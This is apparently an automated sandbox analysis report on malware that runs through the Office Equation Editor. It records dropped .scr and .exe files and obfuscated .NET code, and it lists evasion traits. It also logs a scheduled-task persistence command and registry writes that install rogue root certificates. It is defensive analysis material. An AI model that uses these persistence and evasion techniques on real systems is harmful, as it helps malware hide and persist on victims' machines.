                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_002E5C3E push esp; ret 2_2_002E5C3F
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_002DC10C pushfd ; retf 002Dh 2_2_002DC10D
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_002E601E push ebx; ret 2_2_002E601F
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_002E4067 pushfd ; iretd 2_2_002E4101
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_002DE466 pushad ; retf 2_2_002DE4F4
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_002D8F60 push eax; retf 2_2_002D8F61
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_002D9778 pushad ; ret 2_2_002D9779
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_002DC278 push eax; retn 002Dh 2_2_002DC27D
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_002DC340 push C8002DC3h; retn 002Dh 2_2_002DC345
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_002E5FBD push edx; ret 2_2_002E5FBF
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_002E5CB5 push edx; ret 2_2_002E5CB7
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_002DB58A push edx; retf 2_2_002DB58B
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_002E5E9F push esp; ret 2_2_002E5EBB
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_002E44E5 push edx; ret 2_2_002E44E7
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_002DB6C9 pushad ; ret 2_2_002DB6F5
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_002E5EC2 push esp; ret 2_2_002E5EC3
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 2_2_002E44DB push edx; ret 2_2_002E44DF
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Code function: 5_2_001D328A push eax; retf 5_2_001D32B1
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Code function: 5_2_001D32BD pushad ; retf 5_2_001D32C1
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Code function: 5_2_001D6564 pushad ; retf 5_2_001D6565
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Code function: 13_2_00349AAA push 8B00386Fh; iretd 13_2_00349AAF
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Code function: 13_2_0034328A push eax; retf 13_2_003432B1
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Code function: 13_2_00346564 pushad ; retf 13_2_00346565
                    Source: xobizx[1].scr.2.dr | Static PE information: section name: .text entropy: 7.972982095360775
                    Source: obimohohj75.scr.2.dr | Static PE information: section name: .text entropy: 7.972982095360775
                    Source: pgZzUFYKXcIRkU.exe.5.dr | Static PE information: section name: .text entropy: 7.972982095360775
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, PVkO9JPMvYVLdClLiN.cs | High entropy of concatenated method names: 'O6IweqlMMq', 'TANwRH6kgp', 'bGvwEfJ77Z', 'rM8w9FZrkv', 'Fixw6GvwZc', 'PDywFT5kk0', 'XELwi24PNo', 'SJWwKXd5KJ', 'XTbwqV1n72', 'EwDwdRKlLJ'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, G2ZSj4grjIGLRxUPme.cs | High entropy of concatenated method names: 'YIhPIsXwfr', 'VVrPpluOgh', 'kffP51yyQY', 'OvvPQvVSgK', 'DX3PGXwffY', 'Tv8PlxpmSe', 'R7gP36uZTf', 'qPNPr0PA3V', 'NMoPTg8rTC', 'i7sPBnh4e3'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, wGPs2vQ5cYwwpfdFSH.cs | High entropy of concatenated method names: 'Dispose', 'uS9bX3QGmU', 'beEn9lFdKd', 'n6yaaoa0lg', 'nkXbNlSmSw', 'qKNbzo24Ds', 'ProcessDialogKey', 'qjvn43RO6w', 'uYjnbasTPQ', 'zjLnnf6rJV'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, TqrvIDXhqvyk4oYo0r.cs | High entropy of concatenated method names: 'tfmYuGBEIE', 'G7mYNOU9Un', 'ej6g4l4Kcb', 'rBFgbS3TQr', 'EjeYdJuwGn', 'KtIYs01sHl', 'oVDYAAyNDM', 'uPhYMO91vG', 'tELYtIvJ4G', 'ykGY748qiu'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, r7NahfGaRHXpwgcPPG.cs | High entropy of concatenated method names: 'uVpGm3nCBi', 'W79GSJ6Wof', 'LmGQ0fQVbd', 'gkXQ6oXtng', 'qcbQF2sath', 'W8rQjQ9LHr', 'be7Qih5Ubd', 'RhlQKUUuIP', 'OMTQWlnEe0', 'eKsQq0qSfL'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, qwk4Qv9QyJCsNVKKDQ.cs | High entropy of concatenated method names: 'Udj1bMaVsi', 'nMH1PuDKRs', 'iZE1VkblbB', 'Yw81pfPXcy', 'E4u15jsu3V', 'M5P1G8A6vY', 'vr81l9lpc9', 'h6FgLdgCsv', 'hSjgufeTDa', 'bLrgXdrXab'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, EvTKrVrZpdRryOCsZq.cs | High entropy of concatenated method names: 'ksHgEXIT20', 'hE4g9dC4ma', 'Tkrg0iChJj', 'o2Gg64uxlJ', 'TPygMYEqVJ', 'CZpgF3begY', 'Next', 'Next', 'Next', 'NextBytes'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, ayoI2QBSC5k9Z01VqM.cs | High entropy of concatenated method names: 'lgovgW8gX', 'I2ACoa5tu', 'OgUkVvfe4', 'hnaSj06D8', 'C09R0Gywf', 'f1oHyVKvQ', 'E2aCOrQpiLXr2oBsR7', 'ftMvVEnB3Yc9XUxYKk', 'hIegt8GCq', 'hCVhByf6x'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, BeQ1AODg6yeryL4ZqA.cs | High entropy of concatenated method names: 'IY9gpXI0H6', 'qbEg5B9Qwv', 'my5gQm4Req', 'FPxgGA67Ag', 'sLdglTndow', 'GvZg3gw0wp', 'sg0grXqF5m', 'FvvgTgXmty', 'F9JgBhTm0b', 'HnogfhAqBO'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, SVlNQVmaF6b5jAqO4n.cs | High entropy of concatenated method names: 'RBUlIPDtbo', 'JHjl50Orrt', 'm1xlGhhhUm', 'EsCl3vlvi8', 's5Plry7g6b', 'hWjG2fYg6f', 'DrlGOCTy6J', 'vyYGLc8c3l', 'UnpGuUB1EE', 'sPFGXoEm27'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, hpPwguNbTVJhGmC5km.cs | High entropy of concatenated method names: 'oB2QCPFPgI', 'YPiQkw9di2', 'iyFQepyOBY', 'GphQRBkdD9', 'pi6QxbXpf5', 'eajQc7itEK', 'qKNQYTyXMC', 'uB1Qgi0Hxf', 'QuNQ1MxF17', 'PtVQh7PpiT'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, XAJRNj3qJUtDMUjdFC.cs | High entropy of concatenated method names: 'd6g3pj1OTn', 'wFJ3QBktl4', 'ein3l5DLkR', 'KUUlNdVrFk', 'Bfelz1JSuk', 'vtV340pdvK', 'Qs43bRH9tm', 'P9p3nJLSZA', 'Prf3P6JQvi', 'F2f3VtyiUv'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, mr35evWRIA6iQ3eJNAp.cs | High entropy of concatenated method names: 'eRi1JfjkT2', 'fXp1yHs2mW', 'njE1vFA6Gd', 'Smf1CjiGl8', 'iGC1mDK56w', 'B5b1kUQrKJ', 'W0Y1SIhxpW', 'EB21eJAkpp', 'rNR1RBJH3p', 'mnh1HxoRwQ'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, w41cn5eEcjXfVPc9W3.cs | High entropy of concatenated method names: 'HKob3rBlE3', 'Bi7bro8Jsc', 'C53bBb0bSw', 'xn0bf11WC3', 'BTgbxBYA4y', 'TkPbcd8w5Y', 'Oi0jjcL0PVlYobv2fx', 'H85hNKNv6R1UjIdrs2', 'QP2bb3USh4', 'ANCbPdDU0x'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, t2dMxJW6jcRIsPOcotc.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'SCFhMxbSAV', 'zmRhtjKkQ0', 'eiKh7OAnN1', 'jR7hUPF1O5', 'AE3h26VhKE', 'xYXhOkDjlp', 'GWnhLvaKhv'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, NZ3F1JZLvRhU8cxwHy.cs | High entropy of concatenated method names: 'IPA5M3VwxE', 'aka5tgU2MO', 'j7r57WIwqO', 'uQM5UfovU6', 'MlF52FEjAr', 'Sab5OISHt2', 'FPT5LfMtc5', 'lKO5u6xso0', 'rdq5XhgYAh', 'omZ5N8Ns0u'
                    Source: 5.2.obimohohj75.scr.61d0000.10.raw.unpack, EYWFh7SMXfbjDQJxdS.cs | High entropy of concatenated method names: 'zEE3JKpQAH', 'Ro63ycSvIc', 'pe33vDv3pN', 'vQs3CdFmU4', 'fdb3m4pwI9', 'Elc3kgJwQL', 'C053SZxhuZ', 'DqT3erjTFv', 'yBg3RnFRgD', 'xfb3H1k1Xh'

                    Persistence and Installation Behavior

                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xobizx[1].scr
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\obimohohj75.scr
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\xobizx[1].scr
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | File created: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\obimohohj75.scr

                    Boot Survival

                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scrProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\pgZzUFYKXcIRkU" /XML "C:\Users\user\AppData\Local\Temp\tmp786B.tmp"
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXERegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOTJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 BlobJump to behavior
                    Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\taskeng.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Memory allocated: 1D0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Memory allocated: 25B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Memory allocated: 3F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Memory allocated: 8030000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Memory allocated: 5FF0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Memory allocated: 9030000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Memory allocated: A030000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Memory allocated: A4F0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Memory allocated: 8030000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Memory allocated: 340000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Memory allocated: 22C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Memory allocated: 590000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Memory allocated: 60C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Memory allocated: 51E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Memory allocated: 70C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Memory allocated: 80C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Memory allocated: 8680000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Memory allocated: 60C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Memory allocated: 1C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Memory allocated: 25B0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Memory allocated: 700000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Memory allocated: 1C0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Memory allocated: 2240000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Memory allocated: 1F20000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Thread delayed: delay time: 1200000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Thread delayed: delay time: 1200000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2097
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5178
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1585
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4162
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Window / User API: threadDelayed 1458
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Window / User API: threadDelayed 8392
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2820
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3607
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1548
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2166
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Window / User API: threadDelayed 9449
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Window / User API: threadDelayed 401
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1912 | Thread sleep time: -180000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr TID: 3416 | Thread sleep time: -60000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr TID: 3148 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3408 | Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3428 | Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3244 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3436 | Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3444 | Thread sleep time: -2767011611056431s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3328 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\System32\taskeng.exe TID: 3484 | Thread sleep time: -120000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe TID: 3836 | Thread sleep time: -60000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe TID: 3520 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr TID: 3588 | Thread sleep time: -300000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr TID: 3944 | Thread sleep time: -24903104499507879s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr TID: 3944 | Thread sleep time: -1200000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr TID: 3972 | Thread sleep count: 1458 > 30
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr TID: 3972 | Thread sleep count: 8392 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3712 | Thread sleep count: 2820 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3720 | Thread sleep count: 3607 > 30
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4004 | Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4052 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3800 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3884 | Thread sleep time: -120000s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3908 | Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3784 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe TID: 4048 | Thread sleep time: -60000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe TID: 3108 | Thread sleep time: -17524406870024063s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe TID: 3108 | Thread sleep time: -7200000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe TID: 1640 | Thread sleep count: 9449 > 30
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe TID: 1640 | Thread sleep count: 401 > 30
                    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2436 | Thread sleep time: -60000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Thread delayed: delay time: 1200000
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\pgZzUFYKXcIRkU.exe | Thread delayed: delay time: 1200000
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Process information queried: ProcessInformation
                    Source: C:\Users\user\AppData\Roaming\obimohohj75.scr | Process token adjusted: Debug
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug
